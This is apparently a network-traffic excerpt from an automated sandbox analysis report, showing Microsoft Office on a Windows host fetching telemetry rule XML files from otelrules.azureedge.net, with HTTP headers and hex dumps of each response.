                                                                                                                                                                                  2024-11-23 13:47:54 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                  x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134754Z-178bfbc474b9fdhphC1NYCac0n00000004k00000000026q2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:54 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  130192.168.2.44992113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:54 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                  x-ms-request-id: 1aa9c07b-201e-0096-3276-3bace6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134754Z-174c587ffdfp4vpjhC1TEBybqw000000030000000000bb3r
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  131192.168.2.44992513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:56 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:56 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                  x-ms-request-id: 91a34af8-001e-0028-211e-3dc49f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134756Z-178bfbc474b9fdhphC1NYCac0n00000004gg000000005tqf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:56 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  132192.168.2.44992813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:56 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:56 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                  x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134756Z-178bfbc474bq2pr7hC1NYCkfgg00000004ng00000000bcf5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:57 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  133192.168.2.44992613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:56 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:56 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                  x-ms-request-id: 852b0afa-d01e-00a1-0e9b-3b35b1000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134756Z-174c587ffdfp4vpjhC1TEBybqw000000031g0000000078ty
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:57 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  134192.168.2.44992913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:56 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:57 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1425
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                  x-ms-request-id: 8abb671b-d01e-0049-4b0c-3de7dc000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134757Z-178bfbc474bq2pr7hC1NYCkfgg00000004qg00000000762p
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:57 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  135192.168.2.44992713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:56 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:57 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE976026E"
                                                                                                                                                                                  x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134757Z-178bfbc474bbbqrhhC1NYCvw7400000004q000000000a750
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:57 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  136192.168.2.44993013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:58 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:58 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1388
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                  x-ms-request-id: ce856bd5-501e-007b-6157-3c5ba2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134758Z-15b8b599d88m7pn7hC1TEB4axw000000030g00000000c8r8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:58 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  137192.168.2.44993113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:58 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                  x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134759Z-178bfbc474bscnbchC1NYCe7eg00000004pg00000000aef2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:59 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  138192.168.2.44993213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:58 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1378
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                  x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134759Z-178bfbc474bwlrhlhC1NYCy3kg00000004kg000000006vz9
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
